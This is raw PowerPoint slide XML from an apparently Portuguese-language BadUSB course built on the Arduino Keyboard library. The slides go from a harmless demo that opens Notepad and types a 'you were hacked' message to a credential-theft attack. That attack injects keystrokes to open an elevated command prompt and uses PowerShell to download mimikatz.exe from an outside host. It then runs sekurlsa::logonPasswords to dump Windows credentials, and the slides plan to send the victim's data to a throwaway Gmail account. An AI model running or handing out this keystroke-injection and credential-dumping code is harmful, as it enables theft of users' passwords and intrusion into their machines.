            <a:ext cx="1150043" cy="2344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3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4" grpId="0" animBg="1"/>
      <p:bldP spid="55" grpId="0"/>
      <p:bldP spid="52" grpId="0" animBg="1"/>
      <p:bldP spid="53" grpId="0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Criando um script básico</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="32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12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7F696A4-FA17-4154-AC92-BAD9D01EFAD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="315931" y="1252019"/>
            <a:ext cx="11391900" cy="778387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B5ADCA66-E20D-41F2-B6D3-B27239B28DDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="646779" y="1463266"/>
            <a:ext cx="5656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Digite o código ao lado que será enviado ao seu controlador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3E8D7D6F-E5AB-4381-AA7E-1559794244B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551898" y="1578543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DAAA7BC-A50C-4E36-983D-8377D026AA70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5323045" y="2421527"/>
            <a:ext cx="3930962" cy="297004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100" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0" err="1"/>
              <a:t>Keyboard.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0" err="1"/>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0"/>
              <a:t> setup()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0"/>
              <a:t>{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Keyboard.begin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0"/>
              <a:t>();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delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0"/>
              <a:t>(3000);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Keyboard.press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0"/>
              <a:t>(KEY_LEFT_CTRL);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Keyboard.press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0"/>
              <a:t>(KEY_ESC);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Keyboard.releaseAll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0"/>
              <a:t>();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delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0"/>
              <a:t>(300);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Keyboard.print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0" err="1"/>
              <a:t>notepad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0"/>
              <a:t>");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delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0"/>
              <a:t>(300);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Keyboard.press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0"/>
              <a:t>(KEY_RETURN);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delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0"/>
              <a:t>(300);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Keyboard.print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0" err="1"/>
              <a:t>Voce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0"/>
              <a:t> foi hackeado!!!");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0" err="1"/>
              <a:t>Keyboard.end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0" err="1"/>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1100" dirty="0"/>
              <a:t> loop() {}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DCA1280A-C41C-4373-B19E-239A44D167A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4660" y="2411550"/>
            <a:ext cx="3566752" cy="36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8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7" grpId="0" animBg="1"/>
      <p:bldP spid="58" grpId="0"/>
      <p:bldP spid="72" grpId="0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Criando um script básico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13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6C91CC1-0281-43F5-9676-B47FCA212962}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1726134" y="1732729"/>
            <a:ext cx="8584329" cy="778387"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 640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4BF0F2B-9E76-4B09-A11B-0B90137297C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2183792" y="1941865"/>
            <a:ext cx="8126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script executará e abrirá o Bloco de Notas, digitando em seguida a frase </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1"/>
              <a:t>Voce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t> foi hackeado!!!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FD3908AB-591A-4C42-A3BA-1AD7B3D3E672}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2088912" y="2057142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FB214C-3C2E-4E10-80AC-9799DBD2C60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860166" y="2747931"/>
            <a:ext cx="4764908" cy="35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0" grpId="0" animBg="1"/>
      <p:bldP spid="51" grpId="0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id="{13AFC64C-42B0-4E4F-82D6-E31EE8B8381C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329886" y="4086131"/>
            <a:ext cx="11697179" cy="272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E9061D6-4E8E-4B76-B84B-BA965747CD80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5626886" y="4014335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95A1CCFF-3CB5-4D8D-9180-8DD6733C849C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323315" y="4568505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4F693A9-62BF-4CAC-8762-2BBBC1D6E3FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5620314" y="4495130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Finaliza o teclado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0C21FF9-F203-4897-9959-5595074416B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323315" y="1841834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E98BA61-A118-49F8-940C-0E5A59FECC8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5620314" y="1768459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 o teclado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451EB80-1939-431F-B01A-79F773C52858}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323315" y="2591950"/>
            <a:ext cx="11697179" cy="272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785DD05E-F5FB-4EB0-8A6C-566942C8026F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323315" y="3073189"/>
            <a:ext cx="11697179" cy="272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515DB700-61BB-41C0-8BCA-1CCE2B1A4CC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329886" y="3608083"/>
            <a:ext cx="11697179" cy="272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FA3426D-1081-4822-847F-B022A2249B5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323316" y="3345963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D689927-2CEF-4134-8337-44EED1E3DC3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5620315" y="3259888"/>
            <a:ext cx="24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Digita o Texto “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>notepad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>”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2753199E-B662-400D-956A-F26BF09CBFB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323315" y="2349732"/>
            <a:ext cx="11697179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039A54F0-0795-4C45-A9BD-21E762A47D8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323315" y="2853194"/>
            <a:ext cx="11697179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3551EC10-DC87-4020-99CA-29941CB68FF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329887" y="3839727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53465A1-BAB7-4593-8393-3BF59B7588B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329887" y="4325881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3EFBAEC-E3FF-456F-9753-A39BF5792954}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323316" y="1119930"/>
            <a:ext cx="11697178" cy="272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Script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14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1CF346-5ED7-4D45-AA3C-1172A303F933}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5620315" y="1084655"/>
            <a:ext cx="324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Inclui a Biblioteca para o Teclado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B32CABE-0464-42AA-B4F7-A28C7FFF475C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5620315" y="2314457"/>
            <a:ext cx="587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Minimiza os aplicativos na área de trabalho “Windows” + “d”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7B0D9BA-4C0D-4285-98D3-ABEE42DB9EF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5620315" y="2817919"/>
            <a:ext cx="654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Pressiona as teclas “Windows” + ”r” para abrir o atalho para o “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>”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6C8C8D4-B7FD-4F22-AFE5-A95EFCB3FBCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5626886" y="3779052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Pressiona a tecla ”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Enter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>”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1A703DC-A665-4090-A5A7-890AA5ECEE1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5626886" y="4252506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Digita o Texto “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Voce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> foi hackeado!!!”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C4FEDD9-97BF-485D-AD55-B04E1A7DE258}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5620315" y="2545616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DF335A18-3B56-44AE-AF20-4734BD64EDE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5620315" y="3027488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7E5CAD1-D42D-4E1D-BC90-057F69CCC46E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5626886" y="3536287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66D17BE9-FF99-480F-B3AA-EA46B705A7EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329886" y="2071779"/>
            <a:ext cx="11697179" cy="272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0BE89F5-D325-48DD-96BD-F6DAAEB24BD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5626886" y="2025445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63E158-4980-4097-8A30-B11A9A9E0CD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="438732" y="1097894"/>
            <a:ext cx="596444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#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1"/>
              <a:t>Keyboard.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1"/>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t> setup()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t>{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Keyboard.begin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t>();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delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t>(3000);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Keyboard.press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t>(KEY_LEFT_CTRL);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Keyboard.press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t>(KEY_ESC);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Keyboard.releaseAll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t>();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delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t>(300);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Keyboard.print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1"/>
              <a:t>notepad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t>");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delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t>(300);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Keyboard.press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t>(KEY_RETURN);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delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t>(300);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Keyboard.print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1"/>
              <a:t>Voce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t> foi hackeado!!!");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Keyboard.end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" err="1"/>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0"/>
              <a:t> loop() {}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6054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64" grpId="0" animBg="1"/>
      <p:bldP spid="65" grpId="0" animBg="1"/>
      <p:bldP spid="66" grpId="0" animBg="1"/>
      <p:bldP spid="62" grpId="0" animBg="1"/>
      <p:bldP spid="63" grpId="0"/>
      <p:bldP spid="54" grpId="0" animBg="1"/>
      <p:bldP spid="56" grpId="0" animBg="1"/>
      <p:bldP spid="58" grpId="0" animBg="1"/>
      <p:bldP spid="60" grpId="0" animBg="1"/>
      <p:bldP spid="32" grpId="0" animBg="1"/>
      <p:bldP spid="67" grpId="0"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="55" grpId="0"/>
      <p:bldP spid="57" grpId="0"/>
      <p:bldP spid="59" grpId="0"/>
      <p:bldP spid="61" grpId="0"/>
      <p:bldP spid="68" grpId="0"/>
      <p:bldP spid="69" grpId="0"/>
      <p:bldP spid="70" grpId="0"/>
      <p:bldP spid="71" grpId="0" animBg="1"/>
      <p:bldP spid="72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15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80784715-5F3A-464E-A9B0-CD6E7753B110}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="149766" y="1120468"/>
            <a:ext cx="11722742" cy="817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4688C69-1581-434F-8F0C-D121BA271C9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566276" y="1219301"/>
            <a:ext cx="10334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esse ataque utilizaremos uma conta no Gmail para receber os dados da vítima, mas poderia ser enviado para qualquer serviço de nuvem, como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>dontpad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:hlinkClick r:id="rId52"/>
              </a:rPr>
              <a:t>https://dontpad.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>) entre outros.</a:t>
            </a:r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D57311-83C4-45D5-82A2-43509CE26694}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366748" y="1349967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530B67E-3DB9-441F-965C-3B0C95BBC47D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="149766" y="2181820"/>
            <a:ext cx="11722742" cy="817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2FE620E3-B25B-4764-BC9F-CE9AE805D418}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566276" y="2280653"/>
            <a:ext cx="10334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usar o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>gmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>, crie uma nova conta (não utilize sua conta atual). Baixe as configurações de segurança permitindo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>logon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> não seguro pois utilizaremos um script em </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> para envio das informações.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5CDDC1E-493C-41B9-B0E0-D71A1ED09F54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366748" y="2411319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285DFC7D-B9BB-402D-A4E9-AFC00ED7D752}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="149766" y="3262829"/>
            <a:ext cx="11722742" cy="1662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D8154AD-7C7E-4638-B505-81A9C79457F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566276" y="3361662"/>
            <a:ext cx="10334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Nossa máquina vítima será novamente um Windows e tentaremos conseguir as credenciais do usuário que ficam armazenadas em memória com o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>. O Windows 10 não armazena mais a senha em texto claro, apenas o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> (podendo ser quebrada com uma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>rainbow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), porém, quem utiliza Active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> com autenticação com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Kerberus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> está vulnerável ao ataque, uma vez que precisa gravar as informações de credenciais para o usuário conseguir se conectar caso o Windows fique offline. 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D2D03640-8DF8-46D7-9503-FC1CED3B312C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366748" y="3492328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1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2" grpId="0" animBg="1"/>
      <p:bldP spid="74" grpId="0"/>
      <p:bldP spid="107" grpId="0" animBg="1"/>
      <p:bldP spid="55" grpId="0" animBg="1"/>
      <p:bldP spid="56" grpId="0"/>
      <p:bldP spid="57" grpId="0" animBg="1"/>
      <p:bldP spid="62" grpId="0" animBg="1"/>
      <p:bldP spid="63" grpId="0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16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190437-AA86-4D03-B456-4D2E3268294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227513" y="1024145"/>
            <a:ext cx="3687390" cy="52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17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#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>Keyboard.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>typeKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>){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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>}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setup()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Keyboard.begin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(3000);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(KEY_LEFT_CTRL);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(KEY_ESC);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Keyboard.releaseAll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cmd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(KEY_LEFT_SHIFT) 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(KEY_LEFT_CTRL) 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(KEY_LEFT_ALT);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(121);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Keyboard.releaseAll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083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18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delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>(300);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powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> (new-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System.Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>('http://l2r1.com.br/tools/64/mimikatz.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>','%TEMP%\\pw.exe')");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typeKey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("%TEMP%\\pw.exe &gt; c:\\pwlog.txt &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> pwlog.txt;");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(2000);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privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>::debug");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sekurlsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1"/>
              <a:t>logonPasswords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
              <a:t> full");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 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del</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0"/>
